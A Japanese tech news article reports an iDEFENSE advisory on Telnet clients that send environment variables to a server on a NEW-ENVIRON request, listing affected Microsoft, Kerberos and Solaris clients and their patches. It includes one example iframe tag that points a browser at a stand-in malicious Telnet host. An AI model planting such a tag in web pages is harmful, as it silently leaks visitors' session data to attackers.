米iDEFENSEは米国時間6月14日,複数ベンダーのTelnetクライアント・ソフトに見つかったセキュリティ・ホールを公表した。接続中のTelnetサーバーから特定のコマンドを送信されると,本来は送るべきではないユーザー・マシンの情報をサーバーへ送信してしまう。ただし,送信する情報は任意の環境変数(セッション情報)に限られる。任意のファイルなどを送信するようなことはないので,危険度は小さい。

 今回のセキュリティ・ホールは,Telnetクライアントが入力情報をきちんとチェックしていないことが原因。サーバーから送信された,環境変数を要求する「NEW-ENVIRON」コマンドに無条件で答えてしまう。

 ただし,Telnetサーバーに送信する可能性があるのは環境変数に限定される。このため,このセキュリティ・ホールを突かれても直接的な被害は小さい。別の手法で攻撃するための情報収集に使われる可能性が高い。

 今回のセキュリティ・ホールをiDEFENSEが確認しているTelnetクライアントは以下の通り。

(1)Microsoft Telnet Client(version 5.1.2600.2180)
(2)Kerberos V5 Release 1.3.6 packageに含まれるTelnetクライアント
(3)Solaris 5.9のSUNWtnetc packageに含まれるTelnetクライアント

 このほか,BSDベースのTelnetクライアントも影響を受ける可能性が高いとしている。

 今回のセキュリティ・ホールについては,ユーザーが悪質なTelnetサーバーにアクセスしない限り影響を受けない。ただし,Telnetクライアントで明示的にアクセスしなくても,悪意のあるTelnetサーバーへ接続させられる可能性があるので注意が必要。

 例えば,<iframe src='telnet://malicious.server/'>といったタグが含まれるWebページをブラウザで閲覧すると,登録されているTelnetクライアントが自動的に起動されて「malicious.server」へアクセスさせられる。つまり,Webページをブラウザで閲覧するだけで,今回のセキュリティ・ホールを突かれる恐れがある。

 対策は,各ベンダーが提供するパッチなどを適用すること。マイクロソフトでは,6月15日に「MS05-033」として今回のセキュリティ・ホールに関する情報とパッチを公開済み(関連記事)。米Sun Microsystemsでも,セキュリティ情報や修正版などをリリースしている(公開情報1公開情報2)。

◎参考資料
Multiple Vendor Telnet Client Information Disclosure Vulnerability(米iDEFENSE)

(勝村 幸博=IT Pro)